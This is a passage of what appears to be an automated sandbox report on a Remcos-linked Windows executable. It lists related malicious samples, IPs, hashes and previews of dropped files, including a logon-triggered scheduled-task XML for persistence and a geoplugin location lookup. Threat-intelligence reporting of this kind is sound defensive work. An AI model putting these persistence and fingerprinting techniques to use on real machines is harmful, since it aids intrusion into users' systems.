                                                                                    • geoplugin.net/json.gp
                                                                                    1733417286fc3e005fb672367f368896a7f5540f9ccbc4a8fc3e0e3c0df2cd0e1387254b67938.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    tXcFA8apHU.exeGet hashmaliciousRemcosBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    41.216.183.238Banco Santander Totta _Aconselhamento_Pagamento.imgGet hashmaliciousRemcosBrowse
                                                                                      Chase_Bank_Payemnt_Advice.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        geoplugin.netIB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 178.237.33.50
                                                                                        NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        W6iQkG4jZ1.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        VERSION.dll.dllGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        LdSbZG1iH6.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                        • 178.237.33.50
                                                                                        1733417286fc3e005fb672367f368896a7f5540f9ccbc4a8fc3e0e3c0df2cd0e1387254b67938.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        tXcFA8apHU.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        AS40676USjew.arm6.elfGet hashmaliciousUnknownBrowse
                                                                                        • 107.176.140.9
                                                                                        jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                        • 172.83.185.2
                                                                                        jew.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                        • 103.126.136.29
                                                                                        http://web-quorvyn.azurewebsites.netGet hashmaliciousTechSupportScamBrowse
                                                                                        • 103.126.138.87
                                                                                        http://womenluxuryfashion.comGet hashmaliciousTechSupportScamBrowse
                                                                                        • 103.126.138.87
                                                                                        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 45.35.34.126
                                                                                        http://editableslides.coGet hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                        • 103.126.138.87
                                                                                        xd.arm.elfGet hashmaliciousMiraiBrowse
                                                                                        • 104.149.171.104
                                                                                        Employee_Important_Message.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 103.126.138.87
                                                                                        RFQ 9-XTC-204-60THD.xlsx.exeGet hashmaliciousQuasarBrowse
                                                                                        • 103.126.138.87
                                                                                        ATOM86-ASATOM86NLIB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 178.237.33.50
                                                                                        NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        W6iQkG4jZ1.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        VERSION.dll.dllGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        LdSbZG1iH6.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                        • 178.237.33.50
                                                                                        1733417286fc3e005fb672367f368896a7f5540f9ccbc4a8fc3e0e3c0df2cd0e1387254b67938.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        tXcFA8apHU.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50

                                                                                        JA3 Fingerprints

                                                                                        No context

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PEbZthAqV9.exe.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\PEbZthAqV9.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1216
                                                                                        Entropy (8bit):5.34331486778365
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                        Malicious:true
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\myTuDsvNcebev.exe.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1216
                                                                                        Entropy (8bit):5.34331486778365
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                        Malicious:false
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\PEbZthAqV9.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):963
                                                                                        Entropy (8bit):5.014904284428935
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                        MD5:B66CFB6461E507BB577CDE91F270844E
                                                                                        SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
                                                                                        SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
                                                                                        SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
                                                                                        Malicious:false
                                                                                        Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):2232
                                                                                        Entropy (8bit):5.379552885213346
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:fWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMuge//ZMtUyus:fLHxvCZfIfSKRHmOugras
                                                                                        MD5:8E2B5AEFC842554A5F44260832D5BF81
                                                                                        SHA1:A368B0CF9C7A7C458FFDC4DAE8159E9D6965E482
                                                                                        SHA-256:E345FB0EA03196C7E1195AB8D24A20CF26E501F22600B0F0CE156B2AAD7C8B16
                                                                                        SHA-512:23E8AC189D4933282926751E122BA1BB32C8A45CB8A444AD0A4F0CB59226AD684D87172CCCE1B93B6C8FE3EDD3F706AE4B1A9F4F50F453E7A75E0EBB16D93719
                                                                                        Malicious:false
                                                                                        Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nntabay.dmq.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4oxii0eg.5dk.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j0zpvfr3.jhz.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jyg0glu1.50p.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n3vsa3fc.cq5.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qxi5tuxz.aqg.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3f2zrq2.ajw.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xs2kztd3.s3t.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\tmp53D2.tmp

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\PEbZthAqV9.exe
                                                                                        File Type:XML 1.0 document, ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):1579
                                                                                        Entropy (8bit):5.1093549621335965
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta6xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTNv
                                                                                        MD5:7249B6715C54DC68043E1EE819E25B6F
                                                                                        SHA1:796195736C30F12B710345FF0CDFB741FC1C493C
                                                                                        SHA-256:610E79EB818BAAD148F6509427CCD1F9CB828E6483B22715EE7934BC7AF10190
                                                                                        SHA-512:A06438924D53E5A6D2A6CFEE97FE6B42360AAC40B0EA35C377CCB600176ED1283810FA4CF47093C02A413C0605C7D56ECAF5FEDD28DFEFA6F1DC6FD094BFA477
                                                                                        Malicious:true
                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                        C:\Users\user\AppData\Local\Temp\tmp7C97.tmp

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                        File Type:XML 1.0 document, ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):1579
                                                                                        Entropy (8bit):5.1093549621335965
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta6xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTNv
                                                                                        MD5:7249B6715C54DC68043E1EE819E25B6F
                                                                                        SHA1:796195736C30F12B710345FF0CDFB741FC1C493C
                                                                                        SHA-256:610E79EB818BAAD148F6509427CCD1F9CB828E6483B22715EE7934BC7AF10190
                                                                                        SHA-512:A06438924D53E5A6D2A6CFEE97FE6B42360AAC40B0EA35C377CCB600176ED1283810FA4CF47093C02A413C0605C7D56ECAF5FEDD28DFEFA6F1DC6FD094BFA477
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                        C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\PEbZthAqV9.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):982536
                                                                                        Entropy (8bit):7.953946844210113
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:TuWl35eXIVicKGaiT+zuOiNPjdbdpcg4qCYi:BnXicKE6zuOiNPjdZ4qCYi
                                                                                        MD5:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        SHA1:C41572120BB8F298D4A8683321E7A3B1CC7C54DA
                                                                                        SHA-256:8C62537B7B875C364A79B98ADAA8D341B4A52E4D0A27697F0F07B1209ED53301
                                                                                        SHA-512:D414499348356D4028C97718126DBC51AA240A63B70F3236D73003821910735BCEF0761DA0A873B55ABFB18B71820FCD6BF4E58BAC98109274C477CC68633D94
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8R...............0.................. ........@.. ....................... ............@.................................g...O.......(................6..............p............................................ ............... ..H............text........ ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B........................H...........l..............X............................................0..L.........}.....(.......(......(............s......( ....o!.....("....o#.....($....*.0............}........(%........(&.....,5...(............s......(.....o!.....(.....o#....85....r...p.V...('...o(...tV.......()..........9.....s.........s*...s+...o,......o ...r...po-..........,$..( .....o ...r...po-...s....o.........o/...(0.......o1...(2.......o3...(4.......o5...(6.......o7...(8.......o9...(:.........

                                                                                        C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe:Zone.Identifier

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\PEbZthAqV9.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.953946844210113
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:PEbZthAqV9.exe
                                                                                        File size:982'536 bytes
                                                                                        MD5:10ab4b6fb83aea3840ac04855974f62d
                                                                                        SHA1:c41572120bb8f298d4a8683321e7a3b1cc7c54da
                                                                                        SHA256:8c62537b7b875c364a79b98adaa8d341b4a52e4d0a27697f0f07b1209ed53301
                                                                                        SHA512:d414499348356d4028c97718126dbc51aa240a63b70f3236d73003821910735bcef0761da0a873b55abfb18b71820fcd6bf4e58bac98109274c477cc68633d94
                                                                                        SSDEEP:24576:TuWl35eXIVicKGaiT+zuOiNPjdbdpcg4qCYi:BnXicKE6zuOiNPjdZ4qCYi
                                                                                        TLSH:CE251241B3A4AF93CB6E43B4582497005BF1A2073521E71D1DCAA1C71EE3F6687A1F67
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8R...............0.................. ........@.. ....................... ............@................................

                                                                                        File Icon

                                                                                        Icon Hash:90cececece8e8eb0

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x4edaba
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:true
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
